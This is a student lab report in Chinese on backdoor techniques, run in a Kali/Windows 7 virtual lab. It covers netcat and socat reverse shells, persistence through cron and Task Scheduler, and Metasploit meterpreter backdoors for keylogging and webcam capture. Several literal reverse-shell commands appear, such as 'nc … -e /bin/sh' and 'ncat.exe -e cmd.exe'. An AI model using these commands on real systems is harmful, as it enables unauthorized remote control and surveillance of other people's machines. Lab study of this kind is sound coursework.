其他分享
首页 > 其他分享> > 20165223《网络对抗技术》Exp2 后门原理与实践

20165223《网络对抗技术》Exp2 后门原理与实践

作者:互联网

目录 —— 后门原理与实践

后门原理与实践说明

1.1 实验任务

1.2 基础知识问答

>>>> 什么是后门?
  后门就是不经过正常认证流程而访问系统的通道。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷;但若在发布软件之前没有删除后门程序,后门就成了安全风险,容易被黑客当成漏洞进行攻击。
>>>> 近年来的一些案例

(1)例举你能想到的一个后门进入到你系统中的可能方式?

(2)例举你知道的后门如何启动起来(win及linux)的方式?

参考资料:window服务端常见后门技术Linux后门整理合集

(3)Meterpreter有哪些给你映像深刻的功能?

(4)如何发现自己有系统有没有被安装后门?

linux系统检查方法参考资料:浅谈linux被入侵后要如何检查后门

1.3 常用后门工具

(1)netcat

>>>> ncat简介

>>>> ncat使用

1.Win获得Linux Shell(win7→kali-linux)

  • windows 打开监听:c:\your_nc_dir>ncat.exe -l -p 8888
  • Linux反弹连接win:root@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh
  • windows下获得一个linux shell,可运行任何指令,如ls

2.Linux获得Win Shell(kali-linux→win7)

  • Linux运行监听指令:root@KaliYL:/var/www/html# nc -l -p 8888
  • Windows反弹连接Linux:c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_linux 8888
  • Linux下看到Windows的命令提示

3.其他

(2)ncat扩展

>>>> nc传输数据

>>>> nc传送文件

(3)Meterpreter

参考资料:Meterpreter命令详解

返回目录

实验内容

使用netcat获取主机操作Shell,cron启动

(1)在kali中使用命令man cron了解cron

(2)打开win7虚拟机,先关闭防火墙以及电脑管家等杀毒软件,构建环境

(3)打开win7虚拟机的cmd,输入ipconfig查看主机ip地址

(4)在win7虚拟机的cmd中输入监听命令ncat.exe -l -p 5223

(5)回到kali中,在终端输入crontab -e指令打开文件,编辑一条定时任务

(6)回到win7虚拟机中,等待到第11分钟,到时间后在cmd中输入ls,可以看到已经获取到了kali的控制权

返回目录

使用socat获取主机操作Shell, 任务计划启动

>>>> socat

socat是一个多功能的网络工具,名字来由是” Socket Cat”,可以看作是netcat的加强版。socat的主要作用就是在两个数据流之间建立一个双向通道,端点可以是文件,也可以是端口或某个进程;并且支持众多协议和链接方式:ip, tcp, udp, ipv6, pipe, exec, system, open, proxy, openssl, socket等。socat具有许多强大的功能,例如:端口连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等。
socat格式:socat [参数] 端点1[选项] 端点2[选项]
更多使用方法参考资料:netcat替代品socat

(1)在win7虚拟机中搜索打开计算机管理任务计划程序创建任务

(2)常规任务名称

(3)触发器新建

(4)操作新建

(5)设置完后确认,win+L使计算机锁定,重新打开后可以看到已经开始启动了

(6)回到kali,在终端输入命令socat - tcp:172.20.10.2:5223,即可获取win7的shell

返回目录

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(1)在kali上生成后门程序5223_backdoor.exe

(2)将生成的后门程序通过ncat传送到win7上去

(3)kali使用命令msfconsole进入MSF控制台

返回目录

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)获取目标主机音频

(2)获取目标主机摄像头

(3)获取目标主机击键记录

(4)尝试提权

返回目录

加分项:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

(1)

返回目录

实验遇到的问题及解决方法

(1)kali系统更新后开机蓝屏问题

(2)任务一中主机无法获得kali的控制权

(3)任务三中用MSF meterpreter生成的后门程序在传送到win7的过程中被查杀?

(4)任务四中使用命令webcam_snap打开摄像头失败

参考资料:让虚拟机调用主机的摄像头

返回目录

实验收获与感想

返回目录

标签:后门,exe,5223,Exp2,win7,kali,ncat,20165223
来源: https://www.cnblogs.com/moddy13162201/p/10568867.html